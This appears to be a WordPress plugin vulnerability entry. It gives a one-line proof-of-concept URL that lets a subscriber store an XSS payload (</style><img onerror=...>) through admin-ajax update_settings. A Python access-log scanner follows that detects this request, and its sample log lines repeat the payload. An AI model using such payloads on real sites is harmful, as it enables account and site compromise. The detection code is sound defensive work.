## https://sploitus.com/exploit?id=WPEX-ID:84F53E27-D8D2-4FA3-91F9-447037508D30
Open the following URL when logged in as a subscriber:

`https://example.com/wp-admin/admin-ajax.php?action=update_settings&settings[removeByCSS]=true&settings[removeFromHome]=true&settings[cssCode]=</style><img src%3D1 onerror%3Dalert(document.domain)>`

The XSS will be triggered on any page (both frontend and backend).
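
A defender-side check for the request shown above, added here as an example and not part of the original advisory: it scans web access logs for `admin-ajax.php` calls with `action=update_settings` and flags those whose `settings[cssCode]` value contains HTML markup. The log lines are constructed samples, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format); IPs and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=update_settings&settings[removeByCSS]=true&settings[cssCode]='
    '%3C/style%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 200 1',
    '203.0.113.8 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=update_settings&settings[cssCode]=.ad%7Bdisplay:none%7D HTTP/1.1" 200 1',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 1',
    '203.0.113.7 - - [01/Jan/2024:10:03:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=update_settings&settings%5BcssCode%5D=%3C%2FSTYLE%3E%3Cb%3E HTTP/1.1" 200 1',
]

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A tag opener or closer (</style>, <img ...) has no place in a CSS value.
MARKUP_RE = re.compile(r'</?[a-z]', re.IGNORECASE)


def inspect(line):
    """Return None, or (client, verdict) for a call to the settings action."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith('/wp-admin/admin-ajax.php'):
        return None
    # parse_qs percent-decodes names and values, so %5B/%5D keys and
    # %3C-encoded markup are compared in decoded form.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get('action') != ['update_settings']:
        return None
    if any(MARKUP_RE.search(v) for v in params.get('settings[cssCode]', [])):
        return client, 'markup-in-cssCode'
    # No markup, but still a settings write worth attributing to a user role.
    return client, 'settings-change'


def scan(lines):
    """Collect every flagged (client, verdict) pair, in log order."""
    return [hit for hit in map(inspect, lines) if hit]
```

Parameters sent in a POST body do not appear in access logs, so this covers only the query-string form used in the proof of concept.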